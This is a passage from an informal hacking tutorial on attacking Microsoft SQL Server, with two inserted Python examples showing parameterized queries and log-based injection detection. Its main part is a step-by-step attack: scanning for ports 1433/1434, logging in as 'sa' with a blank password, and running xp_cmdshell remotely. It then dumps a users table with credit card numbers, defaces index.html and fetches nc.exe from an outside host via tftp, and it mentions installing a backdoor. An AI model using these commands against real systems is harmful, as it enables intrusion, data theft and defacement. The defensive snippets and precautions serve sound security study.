Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of www.nosecurity.com. And it was possible because the request of the user was not checked properly. SQL vulnerabilities still exist on many websites. The best solution is to parse the user requests and filter out some characters such as ', ", --, :, etc.
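
Why the character filter above is not enough on its own, as an added example (not code from the original article): the numeric `id` payload needs no quote, and stripping `--` leaves the UNION intact, while an integer-checked, bound parameter rejects it. The SQLite database, the `pages` table and the function names are assumptions for illustration; SQLite has no `TOP`, so that keyword is omitted.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the article's database (SQLite, not MS SQL)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE logintable (login_id INTEGER, login_name TEXT, passwd TEXT);
        INSERT INTO pages VALUES (45, 'Welcome');
        INSERT INTO logintable VALUES (1, 'Rahul', 'P455w0rd');
    """)
    return db

def char_filter(value):
    """The character blacklist the article recommends: strip ' " -- and :"""
    for bad in ("'", '"', "--", ":"):
        value = value.replace(bad, "")
    return value

def lookup_concat(db, raw_id):
    """Weak: the filtered input is still pasted into the SQL text."""
    sql = "SELECT title FROM pages WHERE id=" + char_filter(raw_id)
    return [row[0] for row in db.execute(sql)]

def lookup_param(db, raw_id):
    """Hardened: the id must parse as an integer and is bound as a parameter."""
    try:
        page_id = int(raw_id)
    except ValueError:
        return []  # reject anything that is not a plain integer
    rows = db.execute("SELECT title FROM pages WHERE id=?", (page_id,))
    return [row[0] for row in rows]

# Same shape as the article's request, minus T-SQL's TOP 1.
PAYLOAD = "45 UNION SELECT login_name FROM logintable--"

if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, "45"))     # normal request
    print(lookup_concat(db, PAYLOAD))  # filter removed "--", UNION still ran
    print(lookup_param(db, PAYLOAD))   # rejected before reaching the database
```
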

Part II - using port 1434 (SQL Port)
 
-------------------------------------

Well, up till now we have seen how to break the database using malformed URLs. But that was done using just port 80 (the HTTP port). This time we will use port 1434 for hacking. Before that we will see what database servers actually are and how they work, and then how to exploit them!
 

The designers of MS SQL shipped some default stored procedures along with the product to make things flexible for web designers. A procedure is nothing but a function which can be used to perform some action on the arguments passed to it. These procedures are very important to hackers. Some of the important ones are
 

sp_password -> Changes password for a specific login name.
 
e.g. EXEC sp_password 'oldpass', 'newpass', 'username'

sp_tables -> Shows all the tables in the current database.
 
e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitrary commands on the machine with administrator privileges. (most important)
 

xp_msver -> Shows the MS SQL Server version, including all the info about the OS.
 
e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key.
 

xp_regdeletevalue -> Deletes a registry value.
 

xp_regread -> Reads a registry value
 

xp_regwrite -> Writes a registry key.
 

xp_terminate_process -> Stops a process
 

Well, these are some important procedures. Actually there are more than 50 such procedures. If you want your MS SQL server to be protected then I would recommend deleting all of these procedures. The trick is to open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete each stored procedure by right-clicking it and choosing delete.
 

Note: “Master” is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.
 


Most dangerous threat: Microsoft SQL Server has the default username “sa” with a blank password “”. This has ruined lots of MS SQL servers in the past. Even a virus exploiting this vulnerability has been released.
 

Thatz enough. Let's hack now. First we need to find a vulnerable server. Download a good port scanner (many out there on the web) and scan for IP addresses having port 1433/1434 (TCP or UDP) open. This is the MS SQL port which runs the SQL service. Oracle's port no. is 1521. Let's suppose we got a vulnerable server with IP 198.188.178.1 (it's just an example so don't even try it). Now there are many ways to use the SQL service, like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL Server 2000. Okz. Now go to the DOS prompt and type.
 

C:>osql.exe -?
 
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

Well, this displays the help of the osql tool. It's clear from the help what we have to do now. Type
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “”
 
1>
That's what we get if we log in successfully; otherwise we will get an error message such as login failed for user “sa”.

Now if we want to execute any command on the remote machine then just use the “xp_cmdshell” default stored procedure.
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”
 

I would prefer to use the -Q option instead of -q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files to/from the remote machine. A smart attacker will install a backdoor on the machine to gain access in future as well. Now, as I explained earlier, we can use “information_schema.tables” to get the list of tables and their contents.
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”
 

After getting the table names, look for a table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”
 

And
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”
 

Output:
 

Username creditcard expdate
 
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

Write something in the index.html file?
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’”
 

Wanna upload a file to the remote system?
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”
 

And to download any file we can use the PUT request instead of GET. That's because these commands are being executed on the remote machine and not on ours. So if you give the GET request, the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.
 

Thatz not over. Toolz for hacking the login passwords of SQL servers are easily available on the web. Many buffer overflows are also being discovered which can allow a user to gain complete control of the system with administrator privileges. This article just covers some general issues about database servers.
 

Remember the Sapphire worm, which was released on 25th Jan.? That worm exploited three known vulnerabilities in SQL servers using the 1433/1434 UDP ports.
 

Precautionary measures
 
---------------------------

<*> Change the default password for sa.
 
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ', ", --, :, etc.
<*> Keep up to date with patches.
<*> Block ports 1433/1434 (MS SQL) and 1521 (Oracle) using firewalls.
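
A detection-side complement to these measures, as an added example (not from the original article): the enumeration requests shown in Part I leave UNION SELECT and INFORMATION_SCHEMA query strings in the web server log, and each one is answered with a server error. The simplified log layout, the IP addresses, the HTTP 500 status for the conversion error and the function names are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines: client IP, method, path, query string, HTTP status.
SAMPLE_LOG = """\
203.0.113.7 GET /mypage.asp id=45 200
203.0.113.9 GET /mypage.asp id=45+UNION+SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES-- 500
203.0.113.9 GET /mypage.asp id=45%20union%20select%20top%201%20login_name%20from%20logintable-- 500
198.51.100.4 GET /search.asp q=credit+union+selection+tips 200
"""

PATTERNS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I),
}

def classify(query):
    """Return the names of the patterns matched by the URL-decoded query string."""
    decoded = unquote_plus(query)  # handles both %20 and + encoded spaces
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]

def suspicious_clients(log_text, min_errors=2):
    """Clients with at least min_errors flagged requests answered with HTTP 500."""
    errors = Counter()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip lines that do not fit the assumed layout
        ip, _method, _path, query, status = parts
        if status == "500" and classify(query):
            errors[ip] += 1
    return {ip: n for ip, n in errors.items() if n >= min_errors}

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))
```
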

Remember, security is not an add-on feature. It depends upon the smartness of the administrator. The war between the hacker and the administrator will go on and on and on…. The person who is aware of the latest news or bug reports will win the war. Database admins should keep in touch with some sites.


Enjoy..!! 
